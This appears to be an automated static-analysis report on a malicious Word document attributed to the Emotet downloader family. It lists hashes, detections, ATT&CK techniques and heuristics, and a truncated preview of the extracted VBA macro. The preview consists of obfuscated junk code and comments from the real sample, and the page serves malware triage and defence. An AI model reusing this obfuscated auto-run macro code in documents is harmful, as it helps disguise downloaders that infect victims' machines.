Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 b160f7e0036a12a9…

MALICIOUS

Office (OLE)

74.5 KB Created: 2017-09-25 17:30:00 Authoring application: Microsoft Office Word First seen: 2020-08-25
MD5: 6e6118f6e06d8cff7fdf5ff86417e326 SHA-1: ca90c4c4a0d5869bb82e9c83b91c89a0680dc055 SHA-256: b160f7e0036a12a9b7b499249950aaeec569484ff0d50122c4d32d72c75aaf49
242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6344335-3', indicating it is likely part of the Emotet family. Critical heuristics indicate the presence of VBA macros that utilize the Shell() function, a common technique for downloading and executing secondary payloads. The AutoOpen macro further suggests an automated execution flow upon opening the document.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6344335-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6344335-3
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7493 bytes
SHA-256: f6ba657076b299b7c12dd1e699e8e9c59fb59239449ad4faf1cf33d8f3de3259
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'kNHNEeyzxDuVgrfnHKAdhnEmRnZZUUTaUASGPESNXvdwrMzRNuHebmAgRXXUx
 'EHWtSxLbFYgeVgVbGVvKMfvyLVzyXUpwGYcXuUWzuXMFAaUZHwKHhyBxwTwUVLU
 'xAcNVrygUetgeEBThLysuwvuCZvcWYEuAVXmkXyAfcMrHZerdcFCNZfz
 'PpsHurtPPgKxRfgDwnarHFScCEvXSucbFWARTmPBfNcCThsBLHGPFyprRmrSmdyxXE
 'wDHZKPchNMXsVRMDyhrazbRSTHhLWchVfuefSdtVseGNHAuPUDXmYxHA
 'CWWXcNXmMCDppRarTRmUErrsyCBTubFZdBazGRGczXMkkLLchEcVNyhEuCypg
 'TvZcpsHcrCtDfcDVfntDHpkYNsduSpedwLeVbWpZrHMaxLmrmzAtvkeVKDnmy
 'tFTtBduhndvHUUGPuSaFuxgrYMeXULCfCvcWrZbnXxcPrevHVpWHrZRBrEnytBKw
 'zMwnKxnzFyVhvahWDHbyyctNACWHBENngUdVvVeGsSBZmbskvAnpDfewpezYnddc
 'xDNAxcftwGPDfFFbFeZykrXbauTeaRzaHbyUFutReytXVPEaFYuEsCWWdn
 'ArHkmBgMsxYzmzkKGCWucBFGaBSWsdyHmXmKUXGDFavfywYKpgYLsstmZGHZLEHfxS
 'UeHcNuEFpdArwMZPDcWWLgkygWYdSFBSgxNrYgyvZCCxbfCCHUMLEEvcyzGr
 'mfVkWkNEGEcyFeYYBKdKRUEktvGPBVaWtDHwvZTFpTpCYxbYCXTePzeTETv
 'wLDgFkktBfrDULTcUZwTCzZLEEwSFHCvGTWfmFtVPLrfvFbxNSSsbcuZrxmwzsAKMLD
 'yNvBSKRKNkGZwvuuBCmgdxATAtUYnNgSSZSACeyYpwBmmprRZnTLehRUhKNzvKkP
 'mSkNAAyebdveCccddefnydWrnGtkUGmBgYTkATaeFbVxKsDMDvVXUHfDmuXddAbp
 'YchFASVRMPKpHBRrfSmcKnVNnvKVgYndpkRtBVpsrkCZsrWAxKNEWcZdnfncmudEk
 'xUrwDSSaXhrDgFgsdYtTbRpGkMZHHkFBmbgwEsumxfyXzAsSYkWTBXMaEDkXnDbY
 'xzcPpNawWBgKVSeREHvMSCCMbwvLtnTNAAZnvmREBtpkYpmPkCeLWzGdSUXd
 'BMcUkMPNmrTdRpKxWCsSvXrVSgGKEkdaxvyHSMBSfCwTCGxvmKZxhKMFbFsgkUF
 'arRzcEvnYkdaCnsXeMKNVBHpFYxXLmtweXRMGuCahhYHRkYfAMaXEaSscXc
 'usmtEDrutTCDYkxePULEygaMSxTPmfPnvTGsdTMVMmNgrryznwfUXGMRutDmyPehw
 'NUvtPpZbLrDVXCxBmCchzeHcnhRxErAFdfhYBAxYmLTbKBDNEUvxVntdu
 'HLccUxHaEDkasGgCySHZRAgPZXEsUktBBvWmxdcKPcrWkPVVVswKHzr
 'FzSHeuHsSXHwydDyXBZfHTPaThZpUVsfEkKuUKZTkeycGPLHMxZrYEvXCStvztcBpr
 'NCXfpvdrxAVEBwdccRfUmKNGkUpePkbdpbxVFsZnXKkupwbxcguchenPBH
 'bVTcnvRvgPHDKYhKWycvUaAhuZRfnBvCWxESkKpPAuNHgMAESVRFnruAdLzAna
 'MSuMmvPGYPtXAZybyypxehGZSweZfnFYvBywAddcwpUkGPUuWvAtxthAcCaUwnX
 'TTXLwTCFLtuSLKhmRrbUHUbgdwrUraMDdWAnyGrKXLMXWnZVSFuXFTMVmRAt
 'AKhLDcYVYvsyUpSMVXxnGcbasMBCHZvbspRDgfduuZeZpdYTHYWCUgyKSwnfBRfakNX

Sub WJsV93059()
   On Error Resume Next
End Sub
 Sub mhHA5531()
   On Error Resume Next
   If ydvb > IzRL531 Then
      EfOV2g = 487784771 - Cos(FoW) + Bszc16x - Log(jHT + CLng(3 / CInt(xWRx3 * CDate(VSDTeA4V) / 71 * 17) + wXXq1O68 * JGF) / CFCfe04 + ChrW(rBRX0QTU2 + CStr(LaXi0vb) + 418145290 / Hex(336657550))) - sEdiytpq + qqyk9K8
      ElseIf RnjLzIZlD <= qXrn2 Then
      ZiQRW6692 = PBeGVW / 207199780
      Uxgq = FsUaP3105 + 246657521
   End If
   For ujEm = 6 To 33
      If WwJGe7L53 <> HRw Then
         Zmhm3 = RywiH
      End If
      boiy05aF = 392 + 244954393 + eyJ / Atn(HLvT) + 381545904 + Hex(343) * LAoU9rQ6 - CStr(tTjt)
   Next
   lSDQb89X = bnxt0 / 39599055
End Sub
 Sub zwty4pc()
   On Error Resume Next
   SIrX487n = Sqr(8394)
   JpXWX1aX8 = 512 / Cos(MoPJF65) + SMEE8da0 - Cos(MDW + 330 / 116 + CDate(amCl5)) + 118 - 232 * fXJHu * Chr(7849 + ChrW(aGytGVe + Tan(GykwS8G))) / 842 - CLng(904) / 129274571 / Atn(192 / pKu) / 37816378 + Log(jVj + Int(780)) * BGWr / 4
End Sub
 Sub MmeXrK(fIdW4)
   On Error Resume Next
   CpQRG11m = 237228831
   KpuFF9 = 335309208 + 429128372
End Sub
 Sub ckTCc(dNo)
   On Error Resume Next
   pZKgB8Daa = ntETD * 77305003
End Sub
 Sub pzea(AOyoH05)
   On Error Resume Next
End Sub

Function EdsceWZsbx()
'LdPFexCascMnLCCfYXBNPbfaYUePSfKabBuUwfCaWTLCdkeYCZCEzvGsNDWaKSYA
 'xwnbntSThNgUeymDUcfPeGerEvcpxNrWhezZbAeBMnKZxbLZcnLWPvKnucLnBm
 'BYuyWUNhcebhVNpAKYCdnDaAgLTufSYMKHBaMpdFVbbGxMGrFWhaLtLCXXYNpLeuHGT
 'kUySYSPsKZnYLbuULsmMgLrBuhrsbHCSSGhvYgRMcteVxuEMEynSnEKVEFYWkrgGsm
 'HBGnHyGAXvNgpEgmhpygUZGdemvyktKBnXsmCDZZsnSCauvbGLNYdNzBcCyRHAyg
 'NVyLszNYgakaKCSWwTPWWXVzavayYbSTuNWWNYeZDttUpDbLfrzncXE
 'feeUdXgZLNaLGKAVMFSGZsGmCVVMXSRkYYApTBsKNmbasfUeaxcXVMruAgFsRavy
 'VUfAcfEgvtWKHTuLkSMuSbYYTFycWLNaRVZye
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.